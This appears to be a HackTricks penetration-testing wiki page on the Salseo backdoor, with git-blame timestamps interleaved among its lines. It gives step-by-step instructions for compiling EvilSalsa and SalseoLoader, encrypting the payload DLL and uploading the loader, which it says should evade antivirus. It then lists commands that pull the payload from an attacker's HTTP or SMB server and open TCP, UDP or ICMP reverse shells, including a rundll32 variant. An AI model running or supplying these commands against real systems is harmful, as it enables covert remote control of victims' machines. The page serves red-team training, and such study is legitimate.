2022-08-04 20:47:35 +00:00
# Salseo
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 10:12:47 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-30 10:12:47 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-27 00:14:52 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-12-30 10:12:47 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-04 16:10:29 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2023-12-30 10:12:47 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2022-08-04 20:47:35 +00:00
## Compiling the binaries
2020-07-15 15:43:14 +00:00
Download the source code from the github and compile **EvilSalsa** and **SalseoLoader** . You will need **Visual Studio** installed to compile the code.
2021-10-18 11:21:18 +00:00
Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).
2020-07-15 15:43:14 +00:00
You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in ** "Platform Target".**
2022-08-04 20:47:35 +00:00
(\*\*If you can't find this options press in ** "Project Tab"** and then in ** "\<Project Name> Properties"**)
2020-07-15 15:43:14 +00:00
2022-08-10 14:32:58 +00:00
![](< .. / . gitbook / assets / image ( 132 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
2020-07-15 15:43:14 +00:00
2022-09-27 00:14:52 +00:00
![](< .. / . gitbook / assets / image ( 1 ) ( 2 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
## Prepare the Backdoor
2020-07-15 15:43:14 +00:00
2022-07-06 10:02:18 +00:00
First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly** :
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Python**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python EncrypterAssembly/encrypterassembly.py < FILE > < PASSWORD > < OUTPUT_FILE >
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
2022-08-04 20:47:35 +00:00
### Windows
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
EncrypterAssembly.exe < FILE > < PASSWORD > < OUTPUT_FILE >
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.**
**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...**
2022-08-04 20:47:35 +00:00
## **Execute the backdoor**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Getting a TCP reverse shell (downloading encoded dll through HTTP)**
2020-07-15 15:43:14 +00:00
2022-07-06 10:02:18 +00:00
Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa.
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password http://< Attacker-IP > /evilsalsa.dll.txt reversetcp < Attacker-IP > < Port >
```
2022-08-04 20:47:35 +00:00
### **Getting a UDP reverse shell (downloading encoded dll through SMB)**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password \\< Attacker-IP > /folder/evilsalsa.dll.txt reverseudp < Attacker-IP > < Port >
```
2022-08-04 20:47:35 +00:00
### **Getting a ICMP reverse shell (encoded dll already inside the victim)**
2020-07-15 15:43:14 +00:00
2022-04-05 22:24:52 +00:00
**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh** ](https://github.com/inquisb/icmpsh )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
#### **Disable ICMP Replies:**
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
2022-08-04 20:47:35 +00:00
#### Execute the client:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
python icmpsh_m.py "< Attacker-IP > " "< Victm-IP > "
```
2022-08-04 20:47:35 +00:00
#### Inside the victim, lets execute the salseo thing:
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp < Attacker-IP >
```
2022-08-04 20:47:35 +00:00
## Compiling SalseoLoader as DLL exporting main function
2020-07-15 15:43:14 +00:00
Open the SalseoLoader project using Visual Studio.
2022-08-04 20:47:35 +00:00
### Add before the main function: \[DllExport]
2020-07-15 15:43:14 +00:00
2024-01-10 00:59:55 +00:00
![](< .. / . gitbook / assets / image ( 2 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Install DllExport for this project
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
2020-07-15 15:43:14 +00:00
2024-01-10 00:59:55 +00:00
![](< .. / . gitbook / assets / image ( 3 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
2020-07-15 15:43:14 +00:00
2024-01-10 00:59:55 +00:00
![](< .. / . gitbook / assets / image ( 4 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **U**ninstall DllExport
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
2020-07-15 15:43:14 +00:00
2023-06-14 10:51:55 +00:00
![](< .. / . gitbook / assets / image ( 5 ) ( 1 ) ( 1 ) ( 2 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Exit Visual Studio and execute DllExport\_configure**
2020-07-15 15:43:14 +00:00
Just **exit** Visual Studio
2021-11-30 16:46:07 +00:00
Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat**
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport** ) and press **Apply**
2020-07-15 15:43:14 +00:00
2023-12-27 23:58:16 +00:00
![](< .. / . gitbook / assets / image ( 7 ) ( 1 ) ( 1 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### **Open the project again with visual Studio**
2020-07-15 15:43:14 +00:00
2021-11-30 16:46:07 +00:00
**\[DllExport]** should not be longer marked as error
2020-07-15 15:43:14 +00:00
2023-06-13 10:12:02 +00:00
![](< .. / . gitbook / assets / image ( 8 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Build the solution
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
2020-07-15 15:43:14 +00:00
2022-10-22 15:26:54 +00:00
![](< .. / . gitbook / assets / image ( 10 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64)
2020-07-15 15:43:14 +00:00
2022-09-02 15:27:38 +00:00
![](< .. / . gitbook / assets / image ( 9 ) ( 1 ) ( 1 ) . png > )
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
### Test the generated Dll
2020-07-15 15:43:14 +00:00
Copy and paste the Dll where you want to test it.
Execute:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
rundll32.exe SalseoLoader.dll,main
```
2022-07-06 10:02:18 +00:00
If no error appears, probably you have a functional DLL!!
2020-07-15 15:43:14 +00:00
2022-08-04 20:47:35 +00:00
## Get a shell using the DLL
2020-07-15 15:43:14 +00:00
Don't forget to use a **HTTP** **server** and set a **nc** **listener**
2022-08-04 20:47:35 +00:00
### Powershell
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
2022-08-04 20:47:35 +00:00
### CMD
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
2022-04-28 16:01:33 +00:00
< details >
2023-12-30 10:12:47 +00:00
< summary > < strong > Learn AWS hacking from zero to hero with< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2023-12-30 10:12:47 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop )!
2022-09-27 00:14:52 +00:00
* Get the [**official PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2023-12-30 10:12:47 +00:00
* Discover [**The PEASS Family** ](https://opensea.io/collection/the-peass-family ), our collection of exclusive [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-04 16:10:29 +00:00
* **Join the** 💬 [**Discord group** ](https://discord.gg/hRep4RUj7f ) or the [**telegram group** ](https://t.me/peass ) or **follow** us on **Twitter** 🐦 [**@hacktricks_live** ](https://twitter.com/hacktricks_live )**.**
2023-12-30 10:12:47 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) and [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >